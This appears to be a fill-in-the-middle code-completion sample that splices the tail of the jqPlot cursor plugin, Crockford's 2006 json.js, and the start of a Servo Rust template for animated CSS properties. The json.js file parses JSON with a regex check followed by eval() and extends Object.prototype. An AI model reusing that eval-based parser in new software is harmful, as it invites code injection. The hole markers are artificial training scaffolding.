c.showTooltipGridPosition = false;
if (options.cursor.tooltipFormatString == undefined) {
c.tooltipFormatString = $.jqplot.Cursor.cursorLegendFormatString;
}
}
}
};
// called with context of plot
$.jqplot.Cursor.postDraw = function() {
var c = this.plugins.cursor;
// Memory Leaks patch
if (c.zoomCanvas) {
c.zoomCanvas.resetCanvas();
c.zoomCanvas = null;
}
if (c.cursorCanvas) {
c.cursorCanvas.resetCanvas();
c.cursorCanvas = null;
}
if (c._tooltipElem) {
c._tooltipElem.emptyForce();
c._tooltipElem = null;
}
if (c.zoom) {
c.zoomCanvas = new $.jqplot.GenericCanvas();
this.eventCanvas._elem.before(c.zoomCanvas.createElement(this._gridPadding, 'jqplot-zoom-canvas', this._plotDimensions, this));
c.zoomCanvas.setContext();
}
var elem = document.createElement('div');
c._tooltipElem = $(elem);
elem = null;
c._tooltipElem.addClass('jqplot-cursor-tooltip');
c._tooltipElem.css({position:'absolute', display:'none'});
if (c.zoomCanvas) {
c.zoomCanvas._elem.before(c._tooltipElem);
}
else {
this.eventCanvas._elem.before(c._tooltipElem);
}
if (c.showVerticalLine || c.showHorizontalLine) {
c.cursorCanvas = new $.jqplot.GenericCanvas();
this.eventCanvas._elem.before(c.cursorCanvas.createElement(this._gridPadding, 'jqplot-cursor-canvas', this._plotDimensions, this));
c.cursorCanvas.setContext();
}
// if we are showing the positions in unit coordinates, and no axes groups
// were specified, create a default set.
if (c.showTooltipUnitPosition){
if (c.tooltipAxisGroups.length === 0) {
var series = this.series;
var s;
var temp = [];
for (var i=0; i<series.length; i++) {
s = series[i];
var ax = s.xaxis+','+s.yaxis;
if ($.inArray(ax, temp) == -1) {
temp.push(ax);
}
}
for (var i=0; i<temp.length; i++) {
c.tooltipAxisGroups.push(temp[i].split(','));
}
}
}
};
// Group: methods
//
// method: $.jqplot.Cursor.zoomProxy
// links targetPlot to controllerPlot so that plot zooming of
// targetPlot will be controlled by zooming on the controllerPlot.
// controllerPlot will not actually zoom, but acts as an
// overview plot. Note, the zoom options must be set to true for
// zoomProxy to work.
$.jqplot.Cursor.zoomProxy = function(targetPlot, controllerPlot) {
var tc = targetPlot.plugins.cursor;
var cc = controllerPlot.plugins.cursor;
tc.zoomTarget = true;
tc.zoom = true;
tc.style = 'auto';
tc.dblClickReset = false;
cc.zoom = true;
cc.zoomProxy = true;
controllerPlot.target.bind('jqplotZoom', plotZoom);
controllerPlot.target.bind('jqplotResetZoom', plotReset);
function plotZoom(ev, gridpos, datapos, plot, cursor) {
tc.doZoom(gridpos, datapos, targetPlot, cursor);
}
function plotReset(ev, plot, cursor) {
targetPlot.resetZoom();
}
};
$.jqplot.Cursor.prototype.resetZoom = function(plot, cursor) {
var axes = plot.axes;
var cax = cursor._zoom.axes;
if (!plot.plugins.cursor.zoomProxy && cursor._zoom.isZoomed) {
for (var ax in axes) {
// axes[ax]._ticks = [];
// axes[ax].min = cax[ax].min;
// axes[ax].max = cax[ax].max;
// axes[ax].numberTicks = cax[ax].numberTicks;
// axes[ax].tickInterval = cax[ax].tickInterval;
// // for date axes
// axes[ax].daTickInterval = cax[ax].daTickInterval;
axes[ax].reset();
axes[ax]._ticks = [];
// fake out tick creation algorithm to make sure original auto
// computed format string is used if _overrideFormatString is true
axes[ax]._autoFormatString = cax[ax].tickFormatString;
}
plot.redraw();
cursor._zoom.isZoomed = false;
}
else {
var ctx = cursor.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
plot.target.trigger('jqplotResetZoom', [plot, cursor]);
};
$.jqplot.Cursor.resetZoom = function(plot) {
plot.resetZoom();
};
$.jqplot.Cursor.prototype.doZoom = function (gridpos, datapos, plot, cursor) {
var c = cursor;
var axes = plot.axes;
var zaxes = c._zoom.axes;
var start = zaxes.start;
var end = zaxes.end;
var min, max, dp, span,
newmin, newmax, curax, _numberTicks, ret;
var ctx = plot.plugins.cursor.zoomCanvas._ctx;
// don't zoom if zoom area is too small (in pixels)
if ((c.constrainZoomTo == 'none' && Math.abs(gridpos.x - c._zoom.start[0]) > 6 && Math.abs(gridpos.y - c._zoom.start[1]) > 6) || (c.constrainZoomTo == 'x' && Math.abs(gridpos.x - c._zoom.start[0]) > 6) || (c.constrainZoomTo == 'y' && Math.abs(gridpos.y - c._zoom.start[1]) > 6)) {
if (!plot.plugins.cursor.zoomProxy) {
for (var ax in datapos) {
// make a copy of the original axes to revert back.
if (c._zoom.axes[ax] == undefined) {
c._zoom.axes[ax] = {};
c._zoom.axes[ax].numberTicks = axes[ax].numberTicks;
c._zoom.axes[ax].tickInterval = axes[ax].tickInterval;
// for date axes...
c._zoom.axes[ax].daTickInterval = axes[ax].daTickInterval;
c._zoom.axes[ax].min = axes[ax].min;
c._zoom.axes[ax].max = axes[ax].max;
c._zoom.axes[ax].tickFormatString = (axes[ax].tickOptions != null) ? axes[ax].tickOptions.formatString : '';
}
if ((c.constrainZoomTo == 'none') || (c.constrainZoomTo == 'x' && ax.charAt(0) == 'x') || (c.constrainZoomTo == 'y' && ax.charAt(0) == 'y')) {
dp = datapos[ax];
if (dp != null) {
if (dp > start[ax]) {
newmin = start[ax];
newmax = dp;
}
else {
span = start[ax] - dp;
newmin = dp;
newmax = start[ax];
}
curax = axes[ax];
_numberTicks = null;
// if aligning this axis, use number of ticks from previous axis.
// Do I need to reset somehow if alignTicks is changed and then graph is replotted??
if (curax.alignTicks) {
if (curax.name === 'x2axis' && plot.axes.xaxis.show) {
_numberTicks = plot.axes.xaxis.numberTicks;
}
else if (curax.name.charAt(0) === 'y' && curax.name !== 'yaxis' && curax.name !== 'yMidAxis' && plot.axes.yaxis.show) {
_numberTicks = plot.axes.yaxis.numberTicks;
}
}
if (this.looseZoom && (axes[ax].renderer.constructor === $.jqplot.LinearAxisRenderer || axes[ax].renderer.constructor === $.jqplot.LogAxisRenderer )) { //} || axes[ax].renderer.constructor === $.jqplot.DateAxisRenderer)) {
ret = $.jqplot.LinearTickGenerator(newmin, newmax, curax._scalefact, _numberTicks);
// if new minimum is less than "true" minimum of axis display, adjust it
if (axes[ax].tickInset && ret[0] < axes[ax].min + axes[ax].tickInset * axes[ax].tickInterval) {
ret[0] += ret[4];
ret[2] -= 1;
}
// if new maximum is greater than "true" max of axis display, adjust it
if (axes[ax].tickInset && ret[1] > axes[ax].max - axes[ax].tickInset * axes[ax].tickInterval) {
ret[1] -= ret[4];
ret[2] -= 1;
}
// for log axes, don't fall below current minimum, this will look bad and can't have 0 in range anyway.
if (axes[ax].renderer.constructor === $.jqplot.LogAxisRenderer && ret[0] < axes[ax].min) {
// remove a tick and shift min up
ret[0] += ret[4];
ret[2] -= 1;
}
axes[ax].min = ret[0];
axes[ax].max = ret[1];
axes[ax]._autoFormatString = ret[3];
axes[ax].numberTicks = ret[2];
axes[ax].tickInterval = ret[4];
// for date axes...
axes[ax].daTickInterval = [ret[4]/1000, 'seconds'];
}
else {
axes[ax].min = newmin;
axes[ax].max = newmax;
axes[ax].tickInterval = null;
axes[ax].numberTicks = null;
// for date axes...
axes[ax].daTickInterval = null;
}
axes[ax]._ticks = [];
}
}
// if ((c.constrainZoomTo == 'x' && ax.charAt(0) == 'y' && c.autoscaleConstraint) || (c.constrainZoomTo == 'y' && ax.charAt(0) == 'x' && c.autoscaleConstraint)) {
// dp = datapos[ax];
// if (dp != null) {
// axes[ax].max == null;
// axes[ax].min = null;
// }
// }
}
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
plot.redraw();
c._zoom.isZoomed = true;
ctx = null;
}
plot.target.trigger('jqplotZoom', [gridpos, datapos, plot, cursor]);
}
};
$.jqplot.preInitHooks.push($.jqplot.Cursor.init);
$.jqplot.postDrawHooks.push($.jqplot.Cursor.postDraw);
function updateTooltip(gridpos, datapos, plot) {
var c = plot.plugins.cursor;
var s = '';
var addbr = false;
if (c.showTooltipGridPosition) {
s = gridpos.x+', '+gridpos.y;
addbr = true;
}
if (c.showTooltipUnitPosition) {
var g;
for (var i=0; i<c.tooltipAxisGroups.length; i++) {
g = c.tooltipAxisGroups[i];
if (addbr) {
s += '<br />';
}
if (c.useAxesFormatters) {
for (var j=0; j<g.length; j++) {
if (j) {
s += ', ';
}
var af = plot.axes[g[j]]._ticks[0].formatter;
var afstr = plot.axes[g[j]]._ticks[0].formatString;
s += af(afstr, datapos[g[j]]);
}
}
else {
s += $.jqplot.sprintf(c.tooltipFormatString, datapos[g[0]], datapos[g[1]]);
}
addbr = true;
}
}
if (c.showTooltipDataPosition) {
var series = plot.series;
var ret = getIntersectingPoints(plot, gridpos.x, gridpos.y);
var addbr = false;
for (var i = 0; i< series.length; i++) {
if (series[i].show) {
var idx = series[i].index;
var label = series[i].label.toString();
var cellid = $.inArray(idx, ret.indices);
var sx = undefined;
var sy = undefined;
if (cellid != -1) {
var data = ret.data[cellid].data;
if (c.useAxesFormatters) {
var xf = series[i]._xaxis._ticks[0].formatter;
var yf = series[i]._yaxis._ticks[0].formatter;
var xfstr = series[i]._xaxis._ticks[0].formatString;
var yfstr = series[i]._yaxis._ticks[0].formatString;
sx = xf(xfstr, data[0]);
sy = yf(yfstr, data[1]);
}
else {
sx = data[0];
sy = data[1];
}
if (addbr) {
s += '<br />';
}
s += $.jqplot.sprintf(c.tooltipFormatString, label, sx, sy);
addbr = true;
}
}
}
}
c._tooltipElem.html(s);
}
function moveLine(gridpos, plot) {
var c = plot.plugins.cursor;
var ctx = c.cursorCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
if (c.showVerticalLine) {
c.shapeRenderer.draw(ctx, [[gridpos.x, 0], [gridpos.x, ctx.canvas.height]]);
}
if (c.showHorizontalLine) {
c.shapeRenderer.draw(ctx, [[0, gridpos.y], [ctx.canvas.width, gridpos.y]]);
}
var ret = getIntersectingPoints(plot, gridpos.x, gridpos.y);
if (c.showCursorLegend) {
var cells = $(plot.targetId + ' td.jqplot-cursor-legend-label');
for (var i=0; i<cells.length; i++) {
var idx = $(cells[i]).data('seriesIndex');
var series = plot.series[idx];
var label = series.label.toString();
var cellid = $.inArray(idx, ret.indices);
var sx = undefined;
var sy = undefined;
if (cellid != -1) {
var data = ret.data[cellid].data;
if (c.useAxesFormatters) {
var xf = series._xaxis._ticks[0].formatter;
var yf = series._yaxis._ticks[0].formatter;
var xfstr = series._xaxis._ticks[0].formatString;
var yfstr = series._yaxis._ticks[0].formatString;
sx = xf(xfstr, data[0]);
sy = yf(yfstr, data[1]);
}
else {
sx = data[0];
sy = data[1];
}
}
if (plot.legend.escapeHtml) {
$(cells[i]).text($.jqplot.sprintf(c.cursorLegendFormatString, label, sx, sy));
}
else {
$(cells[i]).html($.jqplot.sprintf(c.cursorLegendFormatString, label, sx, sy));
}
}
}
ctx = null;
}
function getIntersectingPoints(plot, x, y) {
var ret = {indices:[], data:[]};
var s, i, d0, d, j, r, p;
var threshold;
var c = plot.plugins.cursor;
for (var i=0; i<plot.series.length; i++) {
s = plot.series[i];
r = s.renderer;
if (s.show) {
threshold = c.intersectionThreshold;
if (s.showMarker) {
threshold += s.markerRenderer.size/2;
}
for (var j=0; j<s.gridData.length; j++) {
p = s.gridData[j];
// check vertical line
if (c.showVerticalLine) {
if (Math.abs(x-p[0]) <= threshold) {
ret.indices.push(i);
ret.data.push({seriesIndex: i, pointIndex:j, gridData:p, data:s.data[j]});
}
}
}
}
}
return ret;
}
function moveTooltip(gridpos, plot) {
var c = plot.plugins.cursor;
var elem = c._tooltipElem;
switch (c.tooltipLocation) {
case 'nw':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'n':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true)/2;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'ne':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - c.tooltipOffset - elem.outerHeight(true);
break;
case 'e':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - elem.outerHeight(true)/2;
break;
case 'se':
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 's':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true)/2;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 'sw':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
case 'w':
var x = gridpos.x + plot._gridPadding.left - elem.outerWidth(true) - c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top - elem.outerHeight(true)/2;
break;
default:
var x = gridpos.x + plot._gridPadding.left + c.tooltipOffset;
var y = gridpos.y + plot._gridPadding.top + c.tooltipOffset;
break;
}
elem.css('left', x);
elem.css('top', y);
elem = null;
}
function positionTooltip(plot) {
// fake a grid for positioning
var grid = plot._gridPadding;
var c = plot.plugins.cursor;
var elem = c._tooltipElem;
switch (c.tooltipLocation) {
case 'nw':
var a = grid.left + c.tooltipOffset;
var b = grid.top + c.tooltipOffset;
elem.css('left', a);
elem.css('top', b);
break;
case 'n':
var a = (grid.left + (plot._plotDimensions.width - grid.right))/2 - elem.outerWidth(true)/2;
var b = grid.top + c.tooltipOffset;
elem.css('left', a);
elem.css('top', b);
break;
case 'ne':
var a = grid.right + c.tooltipOffset;
var b = grid.top + c.tooltipOffset;
elem.css({right:a, top:b});
break;
case 'e':
var a = grid.right + c.tooltipOffset;
var b = (grid.top + (plot._plotDimensions.height - grid.bottom))/2 - elem.outerHeight(true)/2;
elem.css({right:a, top:b});
break;
case 'se':
var a = grid.right + c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({right:a, bottom:b});
break;
case 's':
var a = (grid.left + (plot._plotDimensions.width - grid.right))/2 - elem.outerWidth(true)/2;
var b = grid.bottom + c.tooltipOffset;
elem.css({left:a, bottom:b});
break;
case 'sw':
var a = grid.left + c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({left:a, bottom:b});
break;
case 'w':
var a = grid.left + c.tooltipOffset;
var b = (grid.top + (plot._plotDimensions.height - grid.bottom))/2 - elem.outerHeight(true)/2;
elem.css({left:a, top:b});
break;
default: // same as 'se'
var a = grid.right - c.tooltipOffset;
var b = grid.bottom + c.tooltipOffset;
elem.css({right:a, bottom:b});
break;
}
elem = null;
}
function handleClick (ev, gridpos, datapos, neighbor, plot) {
ev.preventDefault();
ev.stopImmediatePropagation();
var c = plot.plugins.cursor;
if (c.clickReset) {
c.resetZoom(plot, c);
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
return false;
}
function handleDblClick (ev, gridpos, datapos, neighbor, plot) {
ev.preventDefault();
ev.stopImmediatePropagation();
var c = plot.plugins.cursor;
if (c.dblClickReset) {
c.resetZoom(plot, c);
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
return false;
}
function handleMouseLeave(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
c.onGrid = false;
if (c.show) {
$(ev.target).css('cursor', c.previousCursor);
if (c.showTooltip && !(c._zoom.zooming && c.showTooltipOutsideZoom && !c.constrainOutsideZoom)) {
c._tooltipElem.empty();
c._tooltipElem.hide();
}
if (c.zoom) {
c._zoom.gridpos = gridpos;
c._zoom.datapos = datapos;
}
if (c.showVerticalLine || c.showHorizontalLine) {
var ctx = c.cursorCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
if (c.showCursorLegend) {
var cells = $(plot.targetId + ' td.jqplot-cursor-legend-label');
for (var i=0; i<cells.length; i++) {
var idx = $(cells[i]).data('seriesIndex');
var series = plot.series[idx];
var label = series.label.toString();
if (plot.legend.escapeHtml) {
$(cells[i]).text($.jqplot.sprintf(c.cursorLegendFormatString, label, undefined, undefined));
}
else {
$(cells[i]).html($.jqplot.sprintf(c.cursorLegendFormatString, label, undefined, undefined));
}
}
}
}
}
function handleMouseEnter(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
c.onGrid = true;
if (c.show) {
c.previousCursor = ev.target.style.cursor;
ev.target.style.cursor = c.style;
if (c.showTooltip) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
else {
positionTooltip(plot);
}
c._tooltipElem.show();
}
if (c.showVerticalLine || c.showHorizontalLine) {
moveLine(gridpos, plot);
}
}
}
function handleMouseMove(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
if (c.show) {
if (c.showTooltip) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
}
if (c.showVerticalLine || c.showHorizontalLine) {
moveLine(gridpos, plot);
}
}
}
function getEventPosition(ev) {
var plot = ev.data.plot;
var go = plot.eventCanvas._elem.offset();
var gridPos = {x:ev.pageX - go.left, y:ev.pageY - go.top};
//////
// TO DO: handle yMidAxis
//////
var dataPos = {xaxis:null, yaxis:null, x2axis:null, y2axis:null, y3axis:null, y4axis:null, y5axis:null, y6axis:null, y7axis:null, y8axis:null, y9axis:null, yMidAxis:null};
var an = ['xaxis', 'yaxis', 'x2axis', 'y2axis', 'y3axis', 'y4axis', 'y5axis', 'y6axis', 'y7axis', 'y8axis', 'y9axis', 'yMidAxis'];
var ax = plot.axes;
var n, axis;
for (n=11; n>0; n--) {
axis = an[n-1];
if (ax[axis].show) {
dataPos[axis] = ax[axis].series_p2u(gridPos[axis.charAt(0)]);
}
}
return {offsets:go, gridPos:gridPos, dataPos:dataPos};
}
function handleZoomMove(ev) {
var plot = ev.data.plot;
var c = plot.plugins.cursor;
// don't do anything if not on grid.
if (c.show && c.zoom && c._zoom.started && !c.zoomTarget) {
ev.preventDefault();
var ctx = c.zoomCanvas._ctx;
var positions = getEventPosition(ev);
var gridpos = positions.gridPos;
var datapos = positions.dataPos;
c._zoom.gridpos = gridpos;
c._zoom.datapos = datapos;
c._zoom.zooming = true;
var xpos = gridpos.x;
var ypos = gridpos.y;
var height = ctx.canvas.height;
var width = ctx.canvas.width;
if (c.showTooltip && !c.onGrid && c.showTooltipOutsideZoom) {
updateTooltip(gridpos, datapos, plot);
if (c.followMouse) {
moveTooltip(gridpos, plot);
}
}
if (c.constrainZoomTo == 'x') {
c._zoom.end = [xpos, height];
}
else if (c.constrainZoomTo == 'y') {
c._zoom.end = [width, ypos];
}
else {
c._zoom.end = [xpos, ypos];
}
var sel = window.getSelection;
if (document.selection && document.selection.empty)
{
document.selection.empty();
}
else if (sel && !sel().isCollapsed) {
sel().collapse();
}
drawZoomBox.call(c);
ctx = null;
}
<|fim▁hole|>
function handleMouseDown(ev, gridpos, datapos, neighbor, plot) {
var c = plot.plugins.cursor;
if(plot.plugins.mobile){
$(document).one('vmouseup.jqplot_cursor', {plot:plot}, handleMouseUp);
} else {
$(document).one('mouseup.jqplot_cursor', {plot:plot}, handleMouseUp);
}
var axes = plot.axes;
if (document.onselectstart != undefined) {
c._oldHandlers.onselectstart = document.onselectstart;
document.onselectstart = function () { return false; };
}
if (document.ondrag != undefined) {
c._oldHandlers.ondrag = document.ondrag;
document.ondrag = function () { return false; };
}
if (document.onmousedown != undefined) {
c._oldHandlers.onmousedown = document.onmousedown;
document.onmousedown = function () { return false; };
}
if (c.zoom) {
if (!c.zoomProxy) {
var ctx = c.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
if (c.constrainZoomTo == 'x') {
c._zoom.start = [gridpos.x, 0];
}
else if (c.constrainZoomTo == 'y') {
c._zoom.start = [0, gridpos.y];
}
else {
c._zoom.start = [gridpos.x, gridpos.y];
}
c._zoom.started = true;
for (var ax in datapos) {
// get zoom starting position.
c._zoom.axes.start[ax] = datapos[ax];
}
if(plot.plugins.mobile){
$(document).bind('vmousemove.jqplotCursor', {plot:plot}, handleZoomMove);
} else {
$(document).bind('mousemove.jqplotCursor', {plot:plot}, handleZoomMove);
}
}
}
function handleMouseUp(ev) {
var plot = ev.data.plot;
var c = plot.plugins.cursor;
if (c.zoom && c._zoom.zooming && !c.zoomTarget) {
var xpos = c._zoom.gridpos.x;
var ypos = c._zoom.gridpos.y;
var datapos = c._zoom.datapos;
var height = c.zoomCanvas._ctx.canvas.height;
var width = c.zoomCanvas._ctx.canvas.width;
var axes = plot.axes;
if (c.constrainOutsideZoom && !c.onGrid) {
if (xpos < 0) { xpos = 0; }
else if (xpos > width) { xpos = width; }
if (ypos < 0) { ypos = 0; }
else if (ypos > height) { ypos = height; }
for (var axis in datapos) {
if (datapos[axis]) {
if (axis.charAt(0) == 'x') {
datapos[axis] = axes[axis].series_p2u(xpos);
}
else {
datapos[axis] = axes[axis].series_p2u(ypos);
}
}
}
}
if (c.constrainZoomTo == 'x') {
ypos = height;
}
else if (c.constrainZoomTo == 'y') {
xpos = width;
}
c._zoom.end = [xpos, ypos];
c._zoom.gridpos = {x:xpos, y:ypos};
c.doZoom(c._zoom.gridpos, datapos, plot, c);
}
c._zoom.started = false;
c._zoom.zooming = false;
$(document).unbind('mousemove.jqplotCursor', handleZoomMove);
if (document.onselectstart != undefined && c._oldHandlers.onselectstart != null){
document.onselectstart = c._oldHandlers.onselectstart;
c._oldHandlers.onselectstart = null;
}
if (document.ondrag != undefined && c._oldHandlers.ondrag != null){
document.ondrag = c._oldHandlers.ondrag;
c._oldHandlers.ondrag = null;
}
if (document.onmousedown != undefined && c._oldHandlers.onmousedown != null){
document.onmousedown = c._oldHandlers.onmousedown;
c._oldHandlers.onmousedown = null;
}
}
function drawZoomBox() {
var start = this._zoom.start;
var end = this._zoom.end;
var ctx = this.zoomCanvas._ctx;
var l, t, h, w;
if (end[0] > start[0]) {
l = start[0];
w = end[0] - start[0];
}
else {
l = end[0];
w = start[0] - end[0];
}
if (end[1] > start[1]) {
t = start[1];
h = end[1] - start[1];
}
else {
t = end[1];
h = start[1] - end[1];
}
ctx.fillStyle = 'rgba(0,0,0,0.2)';
ctx.strokeStyle = '#999999';
ctx.lineWidth = 1.0;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx.fillRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx.clearRect(l, t, w, h);
// IE won't show transparent fill rect, so stroke a rect also.
ctx.strokeRect(l,t,w,h);
ctx = null;
}
$.jqplot.CursorLegendRenderer = function(options) {
$.jqplot.TableLegendRenderer.call(this, options);
this.formatString = '%s';
};
$.jqplot.CursorLegendRenderer.prototype = new $.jqplot.TableLegendRenderer();
$.jqplot.CursorLegendRenderer.prototype.constructor = $.jqplot.CursorLegendRenderer;
// called in context of a Legend
$.jqplot.CursorLegendRenderer.prototype.draw = function() {
if (this._elem) {
this._elem.emptyForce();
this._elem = null;
}
if (this.show) {
var series = this._series, s;
// make a table. one line label per row.
var elem = document.createElement('div');
this._elem = $(elem);
elem = null;
this._elem.addClass('jqplot-legend jqplot-cursor-legend');
this._elem.css('position', 'absolute');
var pad = false;
for (var i = 0; i< series.length; i++) {
s = series[i];
if (s.show && s.showLabel) {
var lt = $.jqplot.sprintf(this.formatString, s.label.toString());
if (lt) {
var color = s.color;
if (s._stack && !s.fill) {
color = '';
}
addrow.call(this, lt, color, pad, i);
pad = true;
}
// let plugins add more rows to legend. Used by trend line plugin.
for (var j=0; j<$.jqplot.addLegendRowHooks.length; j++) {
var item = $.jqplot.addLegendRowHooks[j].call(this, s);
if (item) {
addrow.call(this, item.label, item.color, pad);
pad = true;
}
}
}
}
series = s = null;
delete series;
delete s;
}
function addrow(label, color, pad, idx) {
var rs = (pad) ? this.rowSpacing : '0';
var tr = $('<tr class="jqplot-legend jqplot-cursor-legend"></tr>').appendTo(this._elem);
tr.data('seriesIndex', idx);
$('<td class="jqplot-legend jqplot-cursor-legend-swatch" style="padding-top:'+rs+';">'+
'<div style="border:1px solid #cccccc;padding:0.2em;">'+
'<div class="jqplot-cursor-legend-swatch" style="background-color:'+color+';"></div>'+
'</div></td>').appendTo(tr);
var td = $('<td class="jqplot-legend jqplot-cursor-legend-label" style="vertical-align:middle;padding-top:'+rs+';"></td>');
td.appendTo(tr);
td.data('seriesIndex', idx);
if (this.escapeHtml) {
td.text(label);
}
else {
td.html(label);
}
tr = null;
td = null;
}
return this._elem;
};
})(jQuery);<|fim▁end|> | }
|
<|file_name|>json.js<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2002 JSON.org
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
The Software shall be used for Good, not Evil.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
json.js
2006-10-05
This file adds these methods to JavaScript:
object.toJSONString()
This method produces a JSON text from an object. The
object must not contain any cyclical references.
array.toJSONString()
This method produces a JSON text from an array. The
array must not contain any cyclical references.
string.parseJSON()
This method parses a JSON text to produce an object or
array. It will return false if there is an error.
It is expected that these methods will formally become part of the
JavaScript Programming Language in the Fourth Edition of the
ECMAScript standard.
*/
(function () {
var m = {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
},
s = {
array: function (x) {
var a = ['['], b, f, i, l = x.length, v;
for (i = 0; i < l; i += 1) {
v = x[i];
f = s[typeof v];
if (f) {
v = f(v);
if (typeof v == 'string') {
if (b) {
a[a.length] = ',';
}
a[a.length] = v;
b = true;
}
}
}
a[a.length] = ']';
return a.join('');
},
'boolean': function (x) {
return String(x);
},
'null': function (x) {
return "null";
},
number: function (x) {
return isFinite(x) ? String(x) : 'null';
},
object: function (x) {
if (x) {
if (x instanceof Array) {
return s.array(x);
}
var a = ['{'], b, f, i, v;
for (i in x) {
v = x[i];
f = s[typeof v];<|fim▁hole|> a[a.length] = ',';
}
a.push(s.string(i), ':', v);
b = true;
}
}
}
a[a.length] = '}';
return a.join('');
}
return 'null';
},
string: function (x) {
if (/["\\\x00-\x1f]/.test(x)) {
x = x.replace(/([\x00-\x1f\\"])/g, function(a, b) {
var c = m[b];
if (c) {
return c;
}
c = b.charCodeAt();
return '\\u00' +
Math.floor(c / 16).toString(16) +
(c % 16).toString(16);
});
}
return '"' + x + '"';
}
};
Object.prototype.toJSONString = function () {
return s.object(this);
};
Array.prototype.toJSONString = function () {
return s.array(this);
};
})();
String.prototype.parseJSON = function () {
try {
return (/^("(\\.|[^"\\\n\r])*?"|[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t])+?$/.test(this)) &&
eval('(' + this + ')');
} catch (e) {
return false;
}
};<|fim▁end|> | if (f) {
v = f(v);
if (typeof v == 'string') {
if (b) { |
<|file_name|>animated_properties.mako.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use app_units::Au;
use cssparser::{Color as CSSParserColor, Parser, RGBA};
use euclid::{Point2D, Size2D};
use properties::{DeclaredValue, PropertyDeclaration};
use properties::longhands;
use properties::longhands::background_position_x::computed_value::T as BackgroundPositionX;
use properties::longhands::background_position_y::computed_value::T as BackgroundPositionY;
use properties::longhands::background_size::computed_value::T as BackgroundSize;
use properties::longhands::font_weight::computed_value::T as FontWeight;
use properties::longhands::line_height::computed_value::T as LineHeight;
use properties::longhands::text_shadow::computed_value::T as TextShadowList;
use properties::longhands::text_shadow::computed_value::TextShadow;
use properties::longhands::box_shadow::computed_value::T as BoxShadowList;
use properties::longhands::box_shadow::single_value::computed_value::T as BoxShadow;
use properties::longhands::vertical_align::computed_value::T as VerticalAlign;
use properties::longhands::visibility::computed_value::T as Visibility;
use properties::longhands::z_index::computed_value::T as ZIndex;
use std::cmp;
use std::fmt;
use style_traits::ToCss;
use super::ComputedValues;
use values::Either;
use values::computed::{Angle, LengthOrPercentageOrAuto, LengthOrPercentageOrNone};
use values::computed::{BorderRadiusSize, LengthOrNone};
use values::computed::{CalcLengthOrPercentage, Context, LengthOrPercentage};
use values::computed::position::{HorizontalPosition, Position, VerticalPosition};
use values::computed::ToComputedValue;
/// A given transition property, that is either `All`, or an animatable
/// property.
// NB: This needs to be here because it needs all the longhands generated
// beforehand.
#[derive(Copy, Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum TransitionProperty {
/// All, any animatable property changing should generate a transition.
All,
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case},
% endif
% endfor
}
impl TransitionProperty {
/// Iterates over each property that is not `All`.
